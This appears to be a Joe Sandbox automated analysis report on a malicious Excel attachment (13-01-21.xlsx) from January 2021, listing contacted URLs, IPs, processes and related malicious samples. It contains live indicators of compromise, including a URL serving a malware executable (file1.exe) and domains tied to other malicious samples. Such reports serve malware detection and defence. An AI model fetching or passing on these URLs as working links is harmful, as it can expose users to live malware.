                  unknowntrue
                    unknown
                    www.kolamart.com
                    unknown
                    unknowntrue
                      unknown
                      www.usmedicarenow.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://18.195.87.136/ttkkz/file1.exetrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.usmedicarenow.com/bw82/?Ab=gXuD_lh8bfV4RN&x2J8=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==true
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                          high
                          http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://search.ebay.de/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mtv.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.rambler.ru/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://buscar.ya.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2187542396.0000000004B50000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://asp.usatoday.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://rover.ebay.comexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://search.ebay.in/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://%s.comexplorer.exe, 00000006.00000000.2197502968.000000000A330000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      low
                                                      http://msk.afisha.ru/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://search.rediff.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.naver.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.google.ru/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.daum.net/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://buscar.ozu.es/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.about.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.ask.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.cjmall.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.centrum.cz/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://suche.t-online.de/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.google.it/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.auction.co.kr/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.ceneo.pl/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.amazon.de/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2193615801.000000000842E000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://sads.myspace.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://search.sify.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://search.ebay.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.nifty.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.google.si/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.google.cz/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.soso.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.univision.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://search.ebay.it/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2197502968.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://investor.msn.com/explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://service2.bfast.com/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.%s.comPAexplorer.exe, 00000006.00000000.2177669632.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      low
                                                                                                                                                      http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        18.195.87.136
                                                                                                                                                        unknownUnited States
                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                        198.185.159.145
                                                                                                                                                        unknownUnited States
                                                                                                                                                        53831SQUARESPACEUSfalse
                                                                                                                                                        34.102.136.180
                                                                                                                                                        unknownUnited States
                                                                                                                                                        15169GOOGLEUStrue
                                                                                                                                                        184.168.131.241
                                                                                                                                                        unknownUnited States
                                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                        Analysis ID:339203
                                                                                                                                                        Start date:13.01.2021
                                                                                                                                                        Start time:17:19:23
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 9m 57s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:13-01-21.xlsx
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSX@9/6@6/4
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 17.7% (good quality ratio 16.5%)
                                                                                                                                                        • Quality average: 68%
                                                                                                                                                        • Quality standard deviation: 30.5%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 93%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xlsx
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                        • TCP Packets have been reduced to 100

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        17:20:12API Interceptor45x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                        17:20:14API Interceptor71x Sleep call for process: vbc.exe modified
                                                                                                                                                        17:20:38API Interceptor215x Sleep call for process: raserver.exe modified
                                                                                                                                                        17:21:22API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        18.195.87.136NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 18.195.87.136/ttkkz/file2.exe
                                                                                                                                                        198.185.159.145FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.sagamoreca.com/umSa/?o2=jL30vpcXe&8p=UyTvaSmFD25lUd4ardTBuIam1rvtzks7l77Ztn4dC9lTRGgBOu/tAfzbkEFJUjs6BJz+ECp3MA==
                                                                                                                                                        inv.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.anchoriaswimwear.com/hko6/?0VMpBLZ=CEojv2sYebR0H3RYhCMP35nNGQvPVDN0AuPpIsIRSKc8emWiIxvbWj6vXAkcJ2OdTaJh&kFNHjD=aDKPfJsx
                                                                                                                                                        Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.tipsytravelerbar.com/dll/?pR-xlbR=LxAFUOjiWgydqqdU9loxQsWR5MNVQJhbsqL9b9M074pCJjbSowA5tp3w1jBSsyf00EzW&tZxX=YPgXWrNX
                                                                                                                                                        (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.edmondscakes.com/2kf/?D8sTJ=9XMLlWJTI6vAfrHRazBeuJnX2zF/KKkFVijVc9HuNL/CE78GsXIW/AGNdR4jkREGsVcZ&KtxH=XPBh5ZMXf
                                                                                                                                                        price quote.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.rivercitygoldens.com/ga4/?KtxH=PbjpKv8pM&Txltd4t=Y5If+9CLBOv13Fo8r+cec/TZr6rxi9aaTAwRQ428ZcoiXfvkTGK73jqdvPWho5iVAr3s
                                                                                                                                                        PO8479349743085.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.theseeingglass.com/d8h/?bn=fpj2dyTVU459sTu3g3ENtlg+wmcPgNmBihM9KeY7l0jVRhRPuCQYHIKtRBgZuTBCISw4&-Z8=9rjL76NHc42d0ZK
                                                                                                                                                        DHL Shipment Delivery Waybill No 10020202810.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.foolstography.com/nm8/?qL0=Qw6W6GJtNyO6TR4izRaaIP6U01tDIgJICgKwkIBwkDUvO89zTvdQe6nfbDXpV/Hw2qE9&3fN0=JN9hLT4hBH5
                                                                                                                                                        ktJ7ddYI24.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.thegurlzrm.com/0tog/?M6Al=/4jr7LCHSKmEwC0nIyBDWzdsw49l5Vyvz8qozzMPVL01eUV8/jDKw5iviMTtFSNnp3bc&ndFdpd=NjLtYjXpJ86dsD6
                                                                                                                                                        http://coronavirusofficialnews.comGet hashmaliciousBrowse
                                                                                                                                                        • coronavirusofficialnews.com/
                                                                                                                                                        Shipping Documents.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.makethebreastpumpnotsuck.com/xwqs/
                                                                                                                                                        http://39unitedfrkesokoriorimiwsdystreetsmghg.duckdns.org/chnsfrnd1/vbc.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.tasandojoyas.com/pp0/
                                                                                                                                                        IMAGE-14072020.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.thenorwellclipper.com/mq3/
                                                                                                                                                        http://uncapherlaw.comGet hashmaliciousBrowse
                                                                                                                                                        • uncapherlaw.com/
                                                                                                                                                        http://crscovid19.comGet hashmaliciousBrowse
                                                                                                                                                        • crscovid19.com/
                                                                                                                                                        http://bummy.biz/Rechnung-im-Anhang/Get hashmaliciousBrowse
                                                                                                                                                        • bummy.biz/Rechnung-im-Anhang/
                                                                                                                                                        iNYNU6VuC7.exeGet hashmaliciousBrowse
                                                                                                                                                        • champagneframeofmind.com/exE3oS.php?t=gplw3ul315n
                                                                                                                                                        32DOC91109876578987617 PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.originatex.com/pe/?0pTp=nU7pUePYq2rY2TuyRycPq68Rt7EqY3qLy7g1ZoezptJOmkfIjtXO8JvP3WbKk5fBMvuxuDEjwoupiU0r8K0VFg==&5j9L_=qLDTc8lPmjkt
                                                                                                                                                        7sample pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.ecoverhome.com/xx/
                                                                                                                                                        37products.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.jordanmfowler.com/xx/
                                                                                                                                                        P.ORDE.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.agnetix.farm/d7/

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        www.yjpps.comNEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 0.0.0.0
                                                                                                                                                        ext-sq.squarespace.comFtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        xrxSVsbRli.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        QN08qH1zYv.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        FTH2004-005.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.145
                                                                                                                                                        order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.145
                                                                                                                                                        inv.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        Order (2021.01.06).exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        Nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        payment copy.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        https://www.cloudfilesend.com/x/jvNrWPGTjrB1Get hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        List.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        mfcnvy4bb.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.144
                                                                                                                                                        (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        IMG-033-040.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        anthon.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        SQUARESPACEUSFtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        xrxSVsbRli.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.145
